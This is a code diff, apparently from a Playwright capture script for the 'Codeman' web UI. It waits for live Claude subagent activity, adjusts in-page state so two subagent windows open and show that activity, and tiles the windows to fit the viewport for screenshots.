|
||||
const sessions = await listSessions(page);
|
||||
const targetId = process.env.SUBAGENT_SID || (sessions.find((s) => s.mode === 'claude') || sessions[0])?.id;
|
||||
if (targetId) await page.evaluate((id) => window.app.selectSession(id), targetId);
|
||||
// Wait (up to ~25s) for live subagents to arrive via SSE into app.subagents.
|
||||
// Wait (up to ~45s) for live subagents to arrive via SSE into app.subagents.
|
||||
let agents = [];
|
||||
for (let i = 0; i < 25; i++) {
|
||||
for (let i = 0; i < 45; i++) {
|
||||
agents = await page.evaluate(() =>
|
||||
Array.from(window.app.subagents?.entries?.() || []).map(([id, a]) => ({ id, name: a.name ?? a.agentType ?? '' }))
|
||||
);
|
||||
@@ -151,6 +154,44 @@ async function sceneSubagent(browser) {
|
||||
await context.close();
|
||||
return;
|
||||
}
|
||||
// The window body renders from app.subagentActivity, which fills ONLY from live
|
||||
// SSE tool-call/progress events — a fresh client never gets past activity replayed.
|
||||
// So sit connected and wait for live activity to accumulate, then open the two
|
||||
// agents that actually have content (otherwise the windows read "No activity yet").
|
||||
let active = [];
|
||||
for (let i = 0; i < 100; i++) {
|
||||
active = await page.evaluate(() =>
|
||||
Array.from(window.app.subagentActivity?.entries?.() || [])
|
||||
.filter(([, arr]) => Array.isArray(arr) && arr.length >= 1)
|
||||
.map(([id, arr]) => ({ id, n: arr.length }))
|
||||
.sort((a, b) => b.n - a.n)
|
||||
);
|
||||
if (active.length >= 2) break;
|
||||
// xhigh-effort agents churn in bursts between long thinking pauses, so be
|
||||
// patient (~150s); accept a single populated window after ~45s if that's all.
|
||||
if (i >= 30 && active.length >= 1) break;
|
||||
await sleep(1500);
|
||||
}
|
||||
console.log(' agents with live activity:', JSON.stringify(active));
|
||||
const openIds = (active.length ? active : agents).map((a) => a.id);
|
||||
// Capture-only DOM nudge: on fresh dev sessions, a tab's claudeSessionId stays the
|
||||
// Codeman id and never becomes the real Claude conversation UUID, so the window
|
||||
// open-gate (claudeSessionId === agent.sessionId) + the activeTabOnly hide rule both
|
||||
// fail. Re-home the chosen agents onto the active tab and align its claudeSessionId
|
||||
// to the agents' (shared) sessionId so the windows open AND show their live activity.
|
||||
await page.evaluate(
|
||||
(ids) => {
|
||||
const activeId = window.app.activeSessionId;
|
||||
const tab = window.app.sessions.get(activeId);
|
||||
ids.slice(0, 2).forEach((id) => {
|
||||
const a = window.app.subagents.get(id);
|
||||
if (!a) return;
|
||||
a.parentSessionId = activeId;
|
||||
if (tab && a.sessionId) tab.claudeSessionId = a.sessionId;
|
||||
});
|
||||
},
|
||||
openIds
|
||||
);
|
||||
await page.evaluate(
|
||||
(ids) => {
|
||||
ids.slice(0, 2).forEach((id) => {
|
||||
@@ -159,22 +200,33 @@ async function sceneSubagent(browser) {
|
||||
} catch {}
|
||||
});
|
||||
},
|
||||
agents.map((a) => a.id)
|
||||
openIds
|
||||
);
|
||||
await sleep(2000);
|
||||
await page.evaluate(() => {
|
||||
// Viewport-relative tiling: center two subagent windows over the terminal so
|
||||
// the layout adapts to whatever VW/VH the capture uses (e.g. the HQ 1100×650
|
||||
// recipe) instead of overflowing at narrower widths.
|
||||
const wins = Array.from(window.app.subagentWindows.values());
|
||||
const place = [
|
||||
{ left: 360, top: 60, w: 430, h: 330 },
|
||||
{ left: 810, top: 60, w: 430, h: 330 },
|
||||
];
|
||||
const W = window.innerWidth;
|
||||
const H = window.innerHeight;
|
||||
const winW = Math.min(440, Math.floor((W - 60) / 2 - 10));
|
||||
const winH = Math.min(360, Math.floor(H * 0.56));
|
||||
const top = Math.floor(H * 0.16);
|
||||
const gap = 16;
|
||||
const totalW = winW * 2 + gap;
|
||||
const startLeft = Math.max(16, Math.floor((W - totalW) / 2));
|
||||
wins.slice(0, 2).forEach((win, i) => {
|
||||
const el = win.element;
|
||||
const p = place[i];
|
||||
el.style.left = p.left + 'px';
|
||||
el.style.top = p.top + 'px';
|
||||
el.style.width = p.w + 'px';
|
||||
el.style.height = p.h + 'px';
|
||||
// Force visible: a freshly opened window may be hidden by the activeTabOnly
|
||||
// rule before we override it (we also seed subagentActiveTabOnly:false).
|
||||
win.hidden = false;
|
||||
win.minimized = false;
|
||||
el.style.display = 'flex';
|
||||
el.style.left = startLeft + i * (winW + gap) + 'px';
|
||||
el.style.top = top + 'px';
|
||||
el.style.width = winW + 'px';
|
||||
el.style.height = winH + 'px';
|
||||
});
|
||||
});
|
||||
await sleep(1500);
|
||||
|
||||
@@ -79,6 +79,7 @@ const main = async () => {
|
||||
showMonitor: false,
|
||||
showSubagents: false,
|
||||
showProjectInsights: false,
|
||||
showTokenCount: false,
|
||||
};
|
||||
if (planUsage) blob.showPlanUsageLimits = true;
|
||||
localStorage.setItem('codeman-app-settings', JSON.stringify(blob));
|
||||
|
||||